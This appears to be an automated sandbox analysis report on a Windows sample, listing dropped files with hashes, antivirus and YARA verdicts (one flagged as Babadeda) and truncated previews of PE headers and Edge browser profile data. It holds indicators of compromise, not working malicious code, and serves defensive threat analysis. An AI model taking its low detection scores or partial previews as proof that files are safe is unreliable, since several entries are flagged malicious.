                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\nss3.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):2046288
                                                                                        Entropy (8bit):6.787733948558952
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\softokn3.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):257872
                                                                                        Entropy (8bit):6.727482641240852
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):80880
                                                                                        Entropy (8bit):6.920480786566406
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\userCFHCBKKFIJ.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):91648
                                                                                        Entropy (8bit):6.753556592039648
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfDxGLLPmoOq:Hq6+ouCpk2mpcWJ0r+QNTBfDMHmO
                                                                                        MD5:D72007A9646255AC092CF654388CFEB8
                                                                                        SHA1:5899014B81E4BC7BE63DB2170036397110A2FDEC
                                                                                        SHA-256:C8530BB2E1F9BBE484875A2DB1F78552A1FB38EDB911ED6E93E86C48CE34D919
                                                                                        SHA-512:252C6DA72E7B5CB71C12002810EBB09C90AC0657081C71E8E7A0DB28F992177A8A4C589700F3AED4712759559AA843DADFA0D94E1D499DD65D0F4D5D01AB347E
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\userCFHCBKKFIJ.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\userGDHIIIIEHC.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1893888
                                                                                        Entropy (8bit):7.949794819876416
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:1di9oXLlhWykLaYpnirDNlaXhVlq0WxxdhBvFrupS:C9oXph7yhnkaR60WxBdcp
                                                                                        MD5:A0CED1B039766FBE1B0C2DA4F5BBAA5E
                                                                                        SHA1:FC8CD54E79FB23E550E29F6CF0DC0400D8550E15
                                                                                        SHA-256:9E582118BDC2B1BA04A4B393E8A0FC0E2E7156A615E0C411AEA24DE743C7996E
                                                                                        SHA-512:AC2F515E43DE5A5F659C26B1A4ED8F8E7B4090D3CDB9EA9195DDF8E8DA77F6D349DEADD87D6A4A049F0FD3FC4A2D63562D35FA788EE1C0CF09A5A34C936FEB74
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................K...........@..........................0K...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .p*.........................@...tvrujsnp..... 1.....................@...vpziaunm......J.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0aecef04-f01f-43c1-8951-f38b7dc52934.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):44890
                                                                                        Entropy (8bit):6.095098293161141
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW50i1zNt049FMNYskSPnEKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynX0FM4KtSmd6qE7lFoC
                                                                                        MD5:277606DC480026F1670FDBC47E6B89F8
                                                                                        SHA1:DFAF5F1F0A3A3AB645E553597E9B55505A468B97
                                                                                        SHA-256:7490C4B39ECA08748D4BE3A38862C21F1B9DF65A40F6DFA97A6E1445F8A35EED
                                                                                        SHA-512:4F0C0DB3057D1D1AC2E92C7018B4A625DDEEAC39930D8238BC1654535588CE84C9E4D0638F04A6A509EFBADD1C9D1C95A8D0455B8319A1C580FD528477DF105A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1dd03fab-a89c-406c-98e2-0e6d9c9ecdfe.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):48140
                                                                                        Entropy (8bit):6.089642631745028
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:SM7X2zt1jOXtXi3zahXK3IPi1zNt049FJ7sDPw5nNZHQC05CiobJDSgzMMd6qD4e:SMSzMtXijaFK40F7NBWFobtSmd6qE7q
                                                                                        MD5:5938908B2646B71F9A86C4D8433CF358
                                                                                        SHA1:52BE46BA4682876CBF0C597345DD17C1AFD641B3
                                                                                        SHA-256:D7059F433ACD29E235EC8747DDDF7B2C8B52168BBF5669C116F0BA29EE2D0F69
                                                                                        SHA-512:9556116A3E457472C7BF4759C85A9BC58838319E004B938C03BC60EA24C05A097B47EC6F8CABC71B1BEF76CAFA74421F55EFDB9A5FFE169444FC1952C6B204DE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13366271670208478","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1721798074"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\52c574ea-abe1-410c-838e-fc09a0b988da.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):45875
                                                                                        Entropy (8bit):6.091456753390884
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:HDXzgWPsj/qlGJqIY8GB4xKYIPi1zNt049FM97sDPw5nKJDSgzMMd6qD47u3+CiE:H/Ps+wsI7yOKl0FMfKtSmd6qE7lFov
                                                                                        MD5:9EE0A3C1E5739369509D7F9AA4C74435
                                                                                        SHA1:D310EF473AD823F8FC3E21E666D5B1968F25B8C9
                                                                                        SHA-256:E2E029FCBFA0E59A466827F1F81DD873C857D49BD70053B2AA1AA9112478DDFD
                                                                                        SHA-512:453869B0E2933F9B3294EEE41F5B9EB429B8AFF7A300F612331A32C4D6904B06FA1F19B6D89C04A83B7AE0A17C7EDA0CECB5EAA178E7B6208FD3050D579C7610
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13366271670208478","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1721798074"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\6c83ba57-1456-4289-a9e7-f47c2c085690.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):107893
                                                                                        Entropy (8bit):4.640152892265458
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7s:fwUQC5VwBIiElEd2K57P7s
                                                                                        MD5:21CD56820995C4514E60CF6C82134DFC
                                                                                        SHA1:A474999736344AA8AEA008407B41931EEBD8DCAD
                                                                                        SHA-256:98615125BD47487A65491F2C4A8EE0C4B5292D510883CE63CE6B7EA1A4CDF1C8
                                                                                        SHA-512:81135B67AAE29842C59867D614923BE960D2B69AFABEBC2694D86E39C6CCAEBA789BE9EA3245E67418378E8754674B638502FFC77D7ED1C9A6F1C64DF4525969
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):107893
                                                                                        Entropy (8bit):4.640152892265458
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7s:fwUQC5VwBIiElEd2K57P7s
                                                                                        MD5:21CD56820995C4514E60CF6C82134DFC
                                                                                        SHA1:A474999736344AA8AEA008407B41931EEBD8DCAD
                                                                                        SHA-256:98615125BD47487A65491F2C4A8EE0C4B5292D510883CE63CE6B7EA1A4CDF1C8
                                                                                        SHA-512:81135B67AAE29842C59867D614923BE960D2B69AFABEBC2694D86E39C6CCAEBA789BE9EA3245E67418378E8754674B638502FFC77D7ED1C9A6F1C64DF4525969
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4194304
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4194304
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3::
                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):280
                                                                                        Entropy (8bit):4.0984945491284295
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                        MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                        SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                        SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                        SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\32054ba8-23bc-4271-a0b4-484ce64ba1a1.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:L:L
                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3679b0a6-ef35-47a7-91f3-061a82666160.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:L:L
                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:.

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\47014deb-2238-413c-8c59-3365e9fcf04b.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):10679
                                                                                        Entropy (8bit):5.205175285951965
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:stFkdZs6haFvrENbdxPko33a38WbV+FMBQAd3rPVYJ:stFSs6hCDEhT6PbGqQU3O
                                                                                        MD5:02299CF77D9ADBBB36442E14BA8A09DB
                                                                                        SHA1:EB236AD273C7B737BA27A74B429897AAC63BEEDB
                                                                                        SHA-256:0F1F4776A1D5F9D212E8955721EF392AEED5DF8D7A89AC51774747FFCD14F849
                                                                                        SHA-512:2AF72F2CBA67CFC47C106102E1C3BE1685DB286739F5D4821B20D84D843C649425A2AE719C4192E0DE957CCF7A7F286407711EBC413C99052C43191A054FDCDF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13366271670076295","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\49a106a8-4f30-4583-a031-8a6f39bf594b.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):30244
                                                                                        Entropy (8bit):5.565315243332451
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:7rTzUvWK+7pLGLvx8W5wFBf4sK8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPns5nIOTX:7HIvV+cvx8WaFBf3Ku1jaqs5XufCtX
                                                                                        MD5:FC62F2A11A74B26D2873D40FFDD34D91
                                                                                        SHA1:FF9F7681D29FC57A325709DD8B3AAF925EF12FA2
                                                                                        SHA-256:A4CCD4FDBFFF65D49DE651DB18E728EB59A995C8F059A292E85C5788E530FBDC
                                                                                        SHA-512:7ED471C88918B27BF2C2AA6018C58B284231197EEF962A43F3CAE62B20537C0822A59AADAEB2608CDF9D55DE1F1EDDF1532A779749E07B17DD4B662E65115EBA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
